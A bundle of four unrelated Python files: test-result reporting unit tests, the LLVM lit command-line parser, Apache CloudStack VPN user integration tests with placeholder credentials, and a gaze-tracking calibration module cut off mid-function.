set(['passed/test', 'disabled/test']))
def test_add_and_report_crash(self):
"""Tests add_and_report_crash."""
collection = copy.copy(self.full_collection)
collection.set_crashed_with_prefix('Prefix Line')
self.assertEqual(collection.crash_message, 'Prefix Line\n')
self.assertTrue(collection.crashed)
@mock.patch('test_result_util.TestResult.report_to_result_sink')
@mock.patch('result_sink_util.ResultSinkClient.close')
@mock.patch('result_sink_util.ResultSinkClient.__init__', return_value=None)
def test_report_to_result_sink(self, mock_sink_init, mock_sink_close,
mock_report):
"""Tests report_to_result_sink."""
collection = copy.copy(self.full_collection)
collection.report_to_result_sink()
mock_sink_init.assert_called_once()
self.assertEqual(len(collection.test_results), len(mock_report.mock_calls))
mock_sink_close.assert_called()
@mock.patch('shard_util.shard_index', return_value=0)
@mock.patch('time.time', return_value=10000)
def test_standard_json_output(self, *args):
"""Tests standard_json_output."""
passed_test_value = {
'expected': 'PASS',
'actual': 'PASS',
'shard': 0,
'is_unexpected': False
}
failed_test_value = {
'expected': 'PASS',
'actual': 'FAIL FAIL',
'shard': 0,
'is_unexpected': True
}
disabled_test_value = {
'expected': 'SKIP',
'actual': 'SKIP',
'shard': 0,
'is_unexpected': False
}
unexpected_skip_test_value = {
'expected': 'PASS',
'actual': 'SKIP',
'shard': 0,
'is_unexpected': True
}
crashed_test_value = {
'expected': 'PASS',
'actual': 'CRASH',
'shard': 0,
'is_unexpected': True
}
flaky_test_value = {
'expected': 'PASS',
'actual': 'PASS FAIL',
'shard': 0,
'is_unexpected': False,
'is_flaky': True
}
aborted_test_value = {
'expected': 'PASS',
'actual': 'TIMEOUT',
'shard': 0,
'is_unexpected': True
}
expected_tests = collections.OrderedDict()
expected_tests['passed/test'] = passed_test_value
expected_tests['failed/test'] = failed_test_value
expected_tests['disabled/test'] = disabled_test_value
expected_tests['unexpected/skipped_test'] = unexpected_skip_test_value
expected_tests['crashed/test'] = crashed_test_value
expected_tests['flaky/test'] = flaky_test_value
expected_tests['aborted/test'] = aborted_test_value
expected_num_failures_by_type = {
'PASS': 2,
'FAIL': 1,
'CRASH': 1,
'SKIP': 2,
'TIMEOUT': 1
}
expected_json = {
'version': 3,
'path_delimiter': '/',
'seconds_since_epoch': 10000,
'interrupted': False,
'num_failures_by_type': expected_num_failures_by_type,
'tests': expected_tests
}
self.assertEqual(
self.full_collection.standard_json_output(path_delimiter='/'),
expected_json)
def test_test_runner_logs(self):
"""Test test_runner_logs."""
expected_logs = collections.OrderedDict()
expected_logs['passed tests'] = ['passed/test']
expected_logs['disabled tests'] = ['disabled/test']
flaky_logs = ['Failure log of attempt 1:', 'line1', 'line2']
failed_logs = [
'Failure log of attempt 1:', 'line1', 'line2',
'Failure log of attempt 2:', 'line3', 'line4'
]
no_logs = ['Failure log of attempt 1:', '']
expected_logs['flaked tests'] = {'flaky/test': flaky_logs}
expected_logs['failed tests'] = {
'failed/test': failed_logs,
'crashed/test': no_logs,
'unexpected/skipped_test': no_logs,
'aborted/test': no_logs
}
expected_logs['failed/test'] = failed_logs
expected_logs['unexpected/skipped_test'] = no_logs
expected_logs['flaky/test'] = flaky_logs
expected_logs['crashed/test'] = no_logs
expected_logs['aborted/test'] = no_logs
generated_logs = self.full_collection.test_runner_logs()
keys = [
'passed tests', 'disabled tests', 'flaked tests', 'failed tests',
'failed/test', 'unexpected/skipped_test', 'flaky/test', 'crashed/test',
'aborted/test'
]
for key in keys:
self.assertEqual(generated_logs[key], expected_logs[key])
if __name__ == '__main__':
unittest.main()
|
|
import argparse
import os
import shlex
import sys
import lit.reports
import lit.util
def parse_args():
parser = argparse.ArgumentParser(prog='lit')
parser.add_argument('test_paths',
nargs='+',
metavar="TEST_PATH",
help='File or path to include in the test suite')
parser.add_argument('--version',
action='version',
version='%(prog)s ' + lit.__version__)
parser.add_argument("-j", "--threads", "--workers",
dest="workers",
metavar="N",
help="Number of workers used for testing",
type=_positive_int,
default=lit.util.detectCPUs())
parser.add_argument("--config-prefix",
dest="configPrefix",
metavar="NAME",
help="Prefix for 'lit' config files")
parser.add_argument("-D", "--param",
dest="user_params",
metavar="NAME=VAL",
help="Add 'NAME' = 'VAL' to the user defined parameters",
action="append",
default=[])
format_group = parser.add_argument_group("Output Format")
# FIXME: I find these names very confusing, although I like the
# functionality.
format_group.add_argument("-q", "--quiet",
help="Suppress no error output",
action="store_true")
format_group.add_argument("-s", "--succinct",
help="Reduce amount of output",
action="store_true")
format_group.add_argument("-v", "--verbose",
dest="showOutput",
help="Show test output for failures",
action="store_true")
format_group.add_argument("-vv", "--echo-all-commands",
dest="echoAllCommands",
action="store_true",
help="Echo all commands as they are executed to stdout. In case of "
"failure, last command shown will be the failing one.")
format_group.add_argument("-a", "--show-all",
dest="showAllOutput",
help="Display all commandlines and output",
action="store_true")
format_group.add_argument("-o", "--output",
type=lit.reports.JsonReport,
help="Write test results to the provided path",
metavar="PATH")
format_group.add_argument("--no-progress-bar",
dest="useProgressBar",
help="Do not use curses based progress bar",
action="store_false")
format_group.add_argument("--show-unsupported",
help="Show unsupported tests",
action="store_true")
format_group.add_argument("--show-xfail",
help="Show tests that were expected to fail",
action="store_true")
execution_group = parser.add_argument_group("Test Execution")
execution_group.add_argument("--path",
help="Additional paths to add to testing environment",
action="append",
default=[])
execution_group.add_argument("--vg",
dest="useValgrind",
help="Run tests under valgrind",
action="store_true")
execution_group.add_argument("--vg-leak",
dest="valgrindLeakCheck",
help="Check for memory leaks under valgrind",
action="store_true")
execution_group.add_argument("--vg-arg",
dest="valgrindArgs",
metavar="ARG",
help="Specify an extra argument for valgrind",
action="append",
default=[])
execution_group.add_argument("--time-tests",
help="Track elapsed wall time for each test",
action="store_true")
execution_group.add_argument("--no-execute",
dest="noExecute",
help="Don't execute any tests (assume PASS)",
action="store_true")
execution_group.add_argument("--xunit-xml-output",
type=lit.reports.XunitReport,
help="Write XUnit-compatible XML test reports to the specified file")
execution_group.add_argument("--timeout",
dest="maxIndividualTestTime",
help="Maximum time to spend running a single test (in seconds). "
"0 means no time limit. [Default: 0]",
type=_non_negative_int) # TODO(yln): --[no-]test-timeout, instead of 0 allowed
execution_group.add_argument("--max-failures",
help="Stop execution after the given number of failures.",
type=_positive_int)
execution_group.add_argument("--allow-empty-runs",
help="Do not fail the run if all tests are filtered out",
action="store_true")
selection_group = parser.add_argument_group("Test Selection")
selection_group.add_argument("--max-tests",
metavar="N",
help="Maximum number of tests to run",
type=_positive_int)
selection_group.add_argument("--max-time", #TODO(yln): --timeout
dest="timeout",
metavar="N",
help="Maximum time to spend testing (in seconds)",
type=_positive_int)
selection_group.add_argument("--shuffle", # TODO(yln): --order=random
help="Run tests in random order", # default or 'by-path' (+ isEarlyTest())
action="store_true")
selection_group.add_argument("-i", "--incremental", # TODO(yln): --order=failing-first
help="Run modified and failing tests first (updates mtimes)",
action="store_true")
selection_group.add_argument("--filter",
metavar="REGEX",
type=_case_insensitive_regex,
help="Only run tests with paths matching the given regular expression",
default=os.environ.get("LIT_FILTER", ".*"))
selection_group.add_argument("--num-shards", # TODO(yln): --shards N/M
dest="numShards",
metavar="M",
help="Split testsuite into M pieces and only run one",
type=_positive_int,
default=os.environ.get("LIT_NUM_SHARDS"))
selection_group.add_argument("--run-shard",
dest="runShard",
metavar="N",
help="Run shard #N of the testsuite",
type=_positive_int,
default=os.environ.get("LIT_RUN_SHARD"))
debug_group = parser.add_argument_group("Debug and Experimental Options")
debug_group.add_argument("--debug",
help="Enable debugging (for 'lit' development)",
action="store_true")
debug_group.add_argument("--show-suites",
help="Show discovered test suites and exit",
action="store_true")
debug_group.add_argument("--show-tests",
help="Show all discovered tests and exit",
action="store_true")
# LIT is special: environment variables override command line arguments.
env_args = shlex.split(os.environ.get("LIT_OPTS", ""))
args = sys.argv[1:] + env_args
opts = parser.parse_args(args)
# Validate command line options
if opts.echoAllCommands:
opts.showOutput = True
# TODO(python3): Could be enum
if opts.shuffle:
opts.order = 'random'
elif opts.incremental:
opts.order = 'failing-first'
else:
opts.order = 'default'
if opts.numShards or opts.runShard:
if not opts.numShards or not opts.runShard:
parser.error("--num-shards and --run-shard must be used together")
if opts.runShard > opts.numShards:
parser.error("--run-shard must be between 1 and --num-shards (inclusive)")
opts.shard = (opts.runShard, opts.numShards)
else:
opts.shard = None
opts.reports = filter(None, [opts.output, opts.xunit_xml_output])
return opts
def _positive_int(arg):
return _int(arg, 'positive', lambda i: i > 0)
def _non_negative_int(arg):
return _int(arg, 'non-negative', lambda i: i >= 0)
def _int(arg, kind, pred):
desc = "requires {} integer, but found '{}'"
try:
i = int(arg)
except ValueError:
raise _error(desc, kind, arg)
if not pred(i):
raise _error(desc, kind, arg)
return i
def _case_insensitive_regex(arg):
import re
try:
return re.compile(arg, re.IGNORECASE)
except re.error as reason:
raise _error("invalid regular expression: '{}', {}", arg, reason)
def _error(desc, *args):
msg = desc.format(*args)
return argparse.ArgumentTypeError(msg)
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" P1 tests for VPN users
"""
# Import Local Modules
from nose.plugins.attrib import attr
from marvin.cloudstackException import cloudstackAPIException
from marvin.cloudstackTestCase import cloudstackTestCase
from marvin.integration.lib.base import (
Account,
ServiceOffering,
VirtualMachine,
PublicIPAddress,
Vpn,
VpnUser,
Configurations,
NATRule
)
from marvin.integration.lib.common import (get_domain,
get_zone,
get_template,
cleanup_resources,
)
class Services:
"""Test VPN users Services
"""
def __init__(self):
self.services = {
"account": {
"email": "test@test.com",
"firstname": "Test",
"lastname": "User",
"username": "test",
# Random characters are appended for unique
# username
"password": "password",
},
"service_offering": {
"name": "Tiny Instance",
"displaytext": "Tiny Instance",
"cpunumber": 1,
"cpuspeed": 100, # in MHz
"memory": 128, # In MBs
},
"disk_offering": {
"displaytext": "Small Disk Offering",
"name": "Small Disk Offering",
"disksize": 1
},
"virtual_machine": {
"displayname": "TestVM",
"username": "root",
"password": "password",
"ssh_port": 22,
"hypervisor": 'KVM',
"privateport": 22,
"publicport": 22,
"protocol": 'TCP',
},
"vpn_user": {
"username": "test",
"password": "test",
},
"natrule": {
"privateport": 1701,
"publicport": 1701,
"protocol": "UDP"
},
"ostype": 'CentOS 5.5 (64-bit)',
"sleep": 60,
"timeout": 10,
# Networking mode: Advanced, Basic
}
class TestVPNUsers(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.api_client = super(TestVPNUsers,
cls).getClsTestClient().getApiClient()
cls.services = Services().services
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client, cls.services)
cls.zone = get_zone(cls.api_client, cls.services)
cls.services["mode"] = cls.zone.networktype
cls.template = get_template(
cls.api_client,
cls.zone.id,
cls.services["ostype"]
)
cls.services["virtual_machine"]["zoneid"] = cls.zone.id
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.services["service_offering"]
)
cls._cleanup = [cls.service_offering, ]
return
@classmethod
def tearDownClass(cls):
try:
# Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
try:
self.apiclient = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
self.account = Account.create(
self.apiclient,
self.services["account"],
domainid=self.domain.id
)
self.cleanup = [
self.account,
]
self.virtual_machine = VirtualMachine.create(
self.apiclient,
self.services["virtual_machine"],
templateid=self.template.id,
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id
)
self.public_ip = PublicIPAddress.create(
self.apiclient,
accountid=self.virtual_machine.account,
zoneid=self.virtual_machine.zoneid,
domainid=self.virtual_machine.domainid,
services=self.services["virtual_machine"]
)
return
except cloudstackAPIException as e:
self.tearDown()
raise e
def tearDown(self):
try:
# Clean up, terminate the created instance, volumes and snapshots
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def create_VPN(self, public_ip):
"""Creates VPN for the network"""
self.debug("Creating VPN with public IP: %s" % public_ip.ipaddress.id)
try:
# Assign VPN to Public IP
vpn = Vpn.create(self.apiclient,
self.public_ip.ipaddress.id,
account=self.account.name,
domainid=self.account.domainid)
self.debug("Verifying the remote VPN access")
vpns = Vpn.list(self.apiclient,
publicipid=public_ip.ipaddress.id,
listall=True)
self.assertEqual(
isinstance(vpns, list),
True,
"List VPNs shall return a valid response"
)
return vpn
except Exception as e:
self.fail("Failed to create remote VPN access: %s" % e)
def create_VPN_Users(self, rand_name=True, api_client=None):
"""Creates VPN users for the network"""
self.debug("Creating VPN users for account: %s" %
self.account.name)
if api_client is None:
api_client = self.apiclient
try:
vpnuser = VpnUser.create(
api_client,
self.services["vpn_user"]["username"],
self.services["vpn_user"]["password"],
account=self.account.name,
domainid=self.account.domainid,
rand_name=rand_name
)
self.debug("Verifying the remote VPN access")
vpn_users = VpnUser.list(self.apiclient,
id=vpnuser.id,
listall=True)
self.assertEqual(
isinstance(vpn_users, list),
True,
"List VPNs shall return a valid response"
)
return vpnuser
except Exception as e:
self.fail("Failed to create remote VPN users: %s" % e)
@attr(tags=["advanced", "advancedns"])
@attr(configuration='remote.access.vpn.user.limit')
def test_01_VPN_user_limit(self):
"""VPN remote access user limit tests"""
# Validate the following
# prerequisite: change management configuration setting of
# remote.access.vpn.user.limit
# 1. provision more users than is set in the limit
# Provisioning of users after the limit should failProvisioning of
# users after the limit should fail
self.debug("Fetching the limit for remote access VPN users")
configs = Configurations.list(
self.apiclient,
name='remote.access.vpn.user.limit',
listall=True)
self.assertEqual(isinstance(configs, list),
True,
"List configs should return a valid response")
limit = int(configs[0].value)
self.debug("Enabling the VPN access for IP: %s" %
self.public_ip.ipaddress)
self.create_VPN(self.public_ip)
self.debug("Creating %s VPN users" % limit)
for x in range(limit):
self.create_VPN_Users()
self.debug("Adding another user exceeding limit for remote VPN users")
with self.assertRaises(Exception):
self.create_VPN_Users()
self.debug("Limit exceeded exception raised!")
return
@attr(tags=["advanced", "advancedns"])
def test_02_use_vpn_port(self):
"""Test create VPN when L2TP port in use"""
# Validate the following
# 1. set a port forward for UDP: 1701 and enable VPN
# 2. set port forward rule for the udp port 1701 over which L2TP works
# 3. port forward should prevent VPN from being enabled
self.debug("Creating a port forwarding rule on port 1701")
# Create NAT rule
nat_rule = NATRule.create(
self.apiclient,
self.virtual_machine,
self.services["natrule"],
self.public_ip.ipaddress.id)
self.debug("Verifying the NAT rule created")
nat_rules = NATRule.list(self.apiclient, id=nat_rule.id, listall=True)
self.assertEqual(isinstance(nat_rules, list),
True,
"List NAT rules should return a valid response")
self.debug("Enabling the VPN connection for IP: %s" %
self.public_ip.ipaddress)
with self.assertRaises(Exception):
self.create_VPN(self.public_ip)
self.debug("Create VPN connection failed! Test successful!")
return
@attr(tags=["advanced", "advancedns"])
def test_03_enable_vpn_use_port(self):
"""Test create NAT rule when VPN when L2TP enabled"""
# Validate the following
# 1. Enable a VPN connection on source NAT
# 2. Add a VPN user
# 3. add a port forward rule for UDP port 1701. Should result in error
# saying that VPN is enabled over port 1701
self.debug("Enabling the VPN connection for IP: %s" %
self.public_ip.ipaddress)
self.create_VPN(self.public_ip)
self.debug("Creating a port forwarding rule on port 1701")
# Create NAT rule
with self.assertRaises(Exception):
NATRule.create(
self.apiclient,
self.virtual_machine,
self.services["natrule"],
self.public_ip.ipaddress.id)
self.debug("Create NAT rule failed! Test successful!")
return
@attr(tags=["advanced", "advancedns"])
def test_04_add_new_users(self):
"""Test add new users to existing VPN"""
# Validate the following
# 1. Enable a VPN connection on source NAT
# 2. Add new user to VPN when there are already existing users.
# 3. We should be able to successfully establish a VPN connection using
# the newly added user credential.
self.debug("Enabling the VPN connection for IP: %s" %
self.public_ip.ipaddress)
self.create_VPN(self.public_ip)
try:
self.debug("Adding new VPN user to account: %s" %
self.account.name)
self.create_VPN_Users()
# TODO: Verify the VPN connection
self.debug("Adding another user to account")
self.create_VPN_Users()
# TODO: Verify the VPN connection with new user
except Exception as e:
self.fail("Failed to create new VPN user: %s" % e)
return
@attr(tags=["advanced", "advancedns"])
def test_05_add_duplicate_user(self):
"""Test add duplicate user to existing VPN"""
# Validate the following
# 1. Enable a VPN connection on source NAT
# 2. Add a VPN user say "abc" that already an added user to the VPN.
# 3. Adding this VPN user should fail.
self.debug("Enabling the VPN connection for IP: %s" %
self.public_ip.ipaddress)
self.create_VPN(self.public_ip)
self.debug("Adding new VPN user to account: %s" %
self.account.name)
self.create_VPN_Users(rand_name=False)
# TODO: Verify the VPN connection
self.debug("Adding another user to account with same username")
with self.assertRaises(Exception):
self.create_VPN_Users(rand_name=False)
return
@attr(tags=["advanced", "advancedns"])
def test_06_add_VPN_user_global_admin(self):
"""Test as global admin, add a new VPN user to an existing VPN entry
that was created by another account."""
# Steps for verification
# 1. Create a new user and deploy few Vms.
# 2. Enable VPN access. Add few VPN users.
# 3. Make sure that VPN access works as expected.
# 4. As global Admin , add VPN user to this user's existing VPN entry.
# Validate the following
# 1. The newly added VPN user should get configured to the router of
# user account.
# 2. We should be able to use this newly created user credential to
# establish VPN connection that will give access all VMs of this user
self.debug("Enabling VPN connection to account: %s" %
self.account.name)
self.create_VPN(self.public_ip)
self.debug("Creating VPN user for the account: %s" %
self.account.name)
self.create_VPN_Users()
self.debug("Creating a global admin account")
admin = Account.create(self.apiclient,
self.services["account"],
admin=True,
domainid=self.account.domainid)
self.cleanup.append(admin)
self.debug("Creating API client for newly created user")
api_client = self.testClient.createUserApiClient(
UserName=self.account.name,
DomainName=self.account.domain)
self.debug("Adding new user to VPN as a global admin: %s" %
admin.name)
try:
self.create_VPN_Users(api_client=api_client)
except Exception as e:
self.fail("Global admin should be allowed to create VPN user: %s" %
e)
return
@attr(tags=["advanced", "advancedns"])
def test_07_add_VPN_user_domain_admin(self):
"""Test as domain admin, add a new VPN user to an existing VPN entry
that was created by another account."""
# Steps for verification
# 1. Create a new user and deploy few Vms.
# 2. Enable VPN access. Add few VPN users.
# 3. Make sure that VPN access works as expected.
# 4. As domain Admin , add VPN user to this user's existing VPN entry.
# Validate the following
# 1. The newly added VPN user should get configured to the router of
# user account.
# 2. We should be able to use this newly created user credential to
# establish VPN connection that will give access all VMs of this user
self.debug("Enabling VPN connection to account: %s" %
self.account.name)
self.create_VPN(self.public_ip)
self.debug("Creating VPN user for the account: %s" %
self.account.name)
self.create_VPN_Users()
self.debug("Creating a domain admin account")
admin = Account.create(self.apiclient,
self.services["account"],
domainid=self.account.domainid)
self.cleanup.append(admin)
self.debug("Creating API client for newly created user")
api_client = self.testClient.createUserApiClient(
UserName=self.account.name,
DomainName=self.account.domain)
self.debug("Adding new user to VPN as a domain admin: %s" %
admin.name)
try:
self.create_VPN_Users(api_client=api_client)
except Exception as e:
self.fail("Domain admin should be allowed to create VPN user: %s" %
e)
return
|
|
#!/usr/bin/env python
#
# Gaze tracking calibration
# - use calibration video heatmap and priors
#
# AUTHOR : Mike Tyszka
# PLACE : Caltech
# DATES : 2014-05-15 JMT From scratch
#
# This file is part of mrgaze.
#
# mrgaze is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# mrgaze is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with mrgaze. If not, see <http://www.gnu.org/licenses/>.
#
# Copyright 2014 California Institute of Technology.
import os
import cv2
import json
import numpy as np
import pylab as plt
from skimage import filters, exposure
from scipy import ndimage
from mrgaze import moco, engine
def AutoCalibrate(ss_res_dir, cfg):
'''
Automatic calibration transform from pupil center timeseries
'''
# Get fixation heatmap percentile limits and Gaussian blur sigma
pmin = cfg.getfloat('CALIBRATION', 'heatpercmin')
pmax = cfg.getfloat('CALIBRATION', 'heatpercmax')
plims = (pmin, pmax)
sigma = cfg.getfloat('CALIBRATION', 'heatsigma')
# Get target coordinates
targetx = json.loads(cfg.get('CALIBRATION', 'targetx'))
targety = json.loads(cfg.get('CALIBRATION', 'targety'))
# Gaze space target coordinates (n x 2)
targets = np.array([targetx, targety]).transpose()
# Calibration pupilometry file
cal_pupils_csv = os.path.join(ss_res_dir,'cal_pupils.csv')
if not os.path.isfile(cal_pupils_csv):
print('* Calibration pupilometry not found - returning')
return False
# Read raw pupilometry data
p = engine.ReadPupilometry(cal_pupils_csv)
# Extract useful timeseries
t = p[:,0] # Video soft timestamp
px = p[:,2] # Video pupil center, x
py = p[:,3] # Video pupil center, y
blink = p[:,4] # Video blink
# Remove NaNs (blinks, etc) from t, x and y
ok = np.where(blink == 0)
t, x, y = t[ok], px[ok], py[ok]
# Find spatial fixations and sort temporally
# Returns heatmap with axes
fixations, hmap, xedges, yedges = FindFixations(x, y, plims, sigma)
# Temporally sort fixations - required for matching to targets
fixations = SortFixations(t, x, y, fixations)
# Plot labeled calibration heatmap to results directory
PlotCalibration(ss_res_dir, hmap, xedges, yedges, fixations)
# Check for autocalibration problems
n_targets = targets.shape[0]
n_fixations = fixations.shape[0]
if n_targets == n_fixations:
# Compute calibration mapping video to gaze space
C = CalibrationModel(fixations, targets)
# Determine central fixation coordinate in video space
central_fix = CentralFixation(fixations, targets)
# Write calibration results to CSV files in the results subdir
WriteCalibration(ss_res_dir, fixations, C, central_fix)
else:
print('* Number of detected fixations (%d) and targets (%d) differ - exiting' % (n_fixations, n_targets))
# Return empty/dummy values
C = np.array([])
central_fix = 0.0, 0.0
return C, central_fix
def FindFixations(x, y, plims=(5,95), sigma=2.0):
'''
Find fixations by blob location in pupil center heat map
Fixations returned are not time ordered
'''
# Find robust ranges
xmin, xmax = np.percentile(x, plims)
ymin, ymax = np.percentile(y, plims)
# Expand bounding box by 30%
sf = 1.30
hx, hy = (xmax - xmin) * sf * 0.5, (ymax - ymin) * sf * 0.5
cx, cy = (xmin + xmax) * 0.5, (ymin + ymax) * 0.5
xmin, xmax = cx - hx, cx + hx
ymin, ymax = cy - hy, cy + hy
# Compute calibration video heatmap
hmap, xedges, yedges = HeatMap(x, y, (xmin, xmax), (ymin, ymax), sigma)
# Heatmap dimensions
# *** Note y/row, x/col ordering
ny, nx = hmap.shape
# Determine blob threshold for heatmap
# Need to accommodate hotspots from longer fixations
# particularly at center.
# A single fixation blob shouldn't exceed 1% of total frame
# area so clamp heatmap to 99th percentile
pA, pB = np.percentile(hmap, (0, 99))
hmap = exposure.rescale_intensity(hmap, in_range = (pA, pB))
# Otsu threshold clamped heatmap
th = filters.threshold_otsu(hmap)
blobs = np.array(hmap > th, np.uint8)
# Morphological opening (circle 2 pixels diameter)
# kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3,3))
# blobs = cv2.morphologyEx(blobs, cv2.MORPH_OPEN, kernel)
# Label connected components
labels, n_labels = ndimage.label(blobs)
# Find blob centroids
# Transpose before assigning to x and y arrays
pnts = np.array(ndimage.measurements.center_of_mass(hmap, labels, range(1, n_labels+1)))
# Parse x and y coordinates
# *** Note y/row, x/col ordering
fix_x, fix_y = pnts[:,1], pnts[:,0]
# Map blob centroids to video pixel space using xedges and yedges
# of histogram2d bins (heatmap pixels). Note that pixels are centered
# on their coordinates when rendered by imshow. So a pixel at (1,2) is
# rendered as a rectangle with corners at (0.5,1.5) and (1.5, 2.5)
fix_xi = np.interp(fix_x, np.linspace(-0.5, nx-0.5, nx+1), xedges)
fix_yi = np.interp(fix_y, np.linspace(-0.5, ny-0.5, ny+1), yedges)
# Fixation centroids (n x 2)
fixations = np.array((fix_xi, fix_yi)).T
return fixations, hmap, xedges, yedges
def SortFixations(t, x, y, fixations):
'''
Temporally sort detected spatial fixations
Arguments
----
t : float vector
Sample time points in seconds
x : float vector
Pupil center x coordinate timeseries
y : float vector
Pupil center y coordinate timeseries
fixations : n x 2 float array
Detected spatial fixation coordinates
Returns
----
fixations_sorted : 2 x n float array
Spatial fixations sorted temporally
central_fix : float tuple
Pupil center in video space for central fixation
'''
# Count number of fixations and timepoints
nt = x.shape[0]
nf = fixations.shape[0]
# Put coordinate timeseries in columns
X = np.zeros([nt,2])
X[:,0] = x
X[:,1] = y
# Map each pupil center to nearest fixation
idx = NearestFixation(X, fixations)
# Median time of each fixation
t_fix = np.zeros(nf)
for fc in np.arange(0,nf):
t_fix[fc] = np.median(t[idx==fc])
# Temporally sort fixations
fix_order = np.argsort(t_fix)
fixations_sorted = fixations[fix_order,:]
return fixations_sorted
def NearestFixation(X, fixations):
'''
Map pupil centers to index of nearest fixation
'''
# Number of time points and fixations
nt = X.shape[0]
nf = fixations.shape[0]
# Distance array
dist2fix = np.zeros((nt, nf))
# Fill distance array (nt x nfix)
for (fix_i, fix) in enumerate(fixations):
dx, dy = X[:,0] - fix[0], X[:,1] - fix[1]
dist2fix[:, fix_i] = np.sqrt(dx**2 + dy**2)
# Find index of minimum distance fixation for each timepoint
return np.argmin(dist2fix, axis=1)
def CalibrationModel(fixations, targets):
'''
Construct biquadratic transform from video space to gaze space
BIQUADRATIC CALIBRATION MODEL
----
We need to solve the matrix equation C * R = R0 where
C = biquadratic transform matrix (2 x 6) (rank 2, full row rank)
R = fixation matrix (6 x n) in video space (rank 6)
R0 = fixation targets (2 x n) in gaze space (rank 2)
R has rows xx, xy, yy, x, y, 1
Arguments
----
fixations : n x 2 float array
Fixation coordinates in video space. n >= 6
targets : n x 2 float array
Fixation targets in normalized gazed space
Returns
----
C : 2 x 6 float array
Biquadratic video-gaze post-multiply transform matrix
'''
# Init biquadratic coefficient array
C = np.zeros((2,6))
# Need at least 6 points for biquadratic mapping
if fixations.shape[0] < 6:
print('Too few fixations for biquadratic video to gaze mapping')
return C
# Create fixation biquadratic matrix, R
R = MakeR(fixations)
# R0t is the transposed target coordinate array (n x 2)
R0 = targets.transpose()
# Compute C by pseudoinverse of R (R+)
# C.R = R0
# C.R.R+ = R0.R+ = C
Rplus = np.linalg.pinv(R)
C = R0.dot(Rplus)
# Check that C maps correctly
# print(C.dot(R).transpose())
# print(R0.transpose())
return C
def MakeR(points):
# Extract coordinates from n x 2 points matrix
x, y = points[:,0], points[:,1]
# Additional binomial coordinates
xx = x * x
yy = y * y
xy = x * y;
# Construct R (n x 6)
R = np.array((xx, xy, yy, x, y, np.ones_like(x)))
return R
def HeatMap(x, y, xlims, ylims, sigma=1.0):
'''
Convert pupil center timeseries to 2D heatmap
'''
# Eliminate NaNs in x, y (from blinks)
x = x[np.isfinite(x)]
y = y[np.isfinite(y)]
# Parse out limits
xmin, xmax = xlims
ymin, ymax = ylims
#---
# NOTE: heatmap dimensions are y (1st) then x (2nd)
# corresponding to rows then columns.
# All coordinate orderings are adjusted accordingly
#---
# Composite histogram axis ranges
# Make bin count different for x and y for debugging
# *** Note y/row, x/col ordering
hbins = [np.linspace(ymin, ymax, 64), np.linspace(xmin, xmax, 65)]
# Construct histogram
# *** Note y/row, x/col ordering
hmap, yedges, xedges = np.histogram2d(y, x, bins=hbins)
# Gaussian blur
if sigma > 0:
hmap = cv2.GaussianBlur(hmap, (0,0), sigma, sigma)
return hmap, xedges, yedges
def ApplyCalibration(ss_dir, C, central_fix, cfg):
'''
Apply calibration transform to gaze pupil center timeseries
- apply motion correction if requested (highpass or known fixations)
- Save calibrated gaze to text file in results directory
Arguments
----
Returns
----
'''
print(' Calibrating pupilometry timeseries')
# Uncalibrated gaze pupilometry file
gaze_uncal_csv = os.path.join(ss_dir,'results','gaze_pupils.csv')
# Known central fixations file
fixations_txt = os.path.join(ss_dir,'videos','fixations.txt')
if not os.path.isfile(gaze_uncal_csv):
print('* Uncalibrated gaze pupilometry not found - returning')
return False
# Read raw pupilometry data
p = engine.ReadPupilometry(gaze_uncal_csv)
# Extract useful timeseries
t = p[:,0] # Video soft timestamp
x = p[:,2] # Pupil x
y = p[:,3] # Pupil y
# Retrospective motion correction - only use when consistent glint is unavailable
motioncorr = cfg.get('ARTIFACTS','motioncorr')
mocokernel = cfg.getint('ARTIFACTS','mocokernel')
if motioncorr == 'knownfixations':
print(' Motion correction using known fixations')
print(' Central fixation at (%0.3f, %0.3f)' % (central_fix[0], central_fix[1]))
x, y, bx, by = moco.KnownFixations(t, x, y, fixations_txt, central_fix)
elif motioncorr == 'highpass':
print(' Motion correction by high pass filtering (%d sample kernel)' % mocokernel)
print(' Central fixation at (%0.3f, %0.3f)' % (central_fix[0], central_fix[1]))
x, y, bx, by = moco.HighPassFilter(t, x, y, mocokernel, central_fix)
elif motioncorr == 'glint':
print(' Using glint for motion correction. Skipping here, in calibrate.py (for now)')
# Return dummy x and y baseline estimates
bx, by = np.zeros_like(x), np.zeros_like(y)
else:
print('* Unknown motion correction requested (%s) - skipping' % (motioncorr))
# Return dummy x and y baseline estimates
bx, by = np.zeros_like(x), np.zeros_like(y)
# Additional binomial coordinates
xx = x * x
yy = y * y
xy = x * y
# Construct R
R = np.array((xx, xy, yy, x, y, np.ones_like(x)))
# Apply calibration transform to pupil-glint vector timeseries
# (2 x n) = (2 x 6) x (6 x n)
gaze = C.dot(R)
# Write calibrated gaze to CSV file in results directory
gaze_csv = os.path.join(ss_dir,'results','gaze_calibrated.csv')
WriteGaze(gaze_csv, t, gaze[0,:], gaze[1,:], bx, by)
return True
def CentralFixation(fixations, targets):
'''
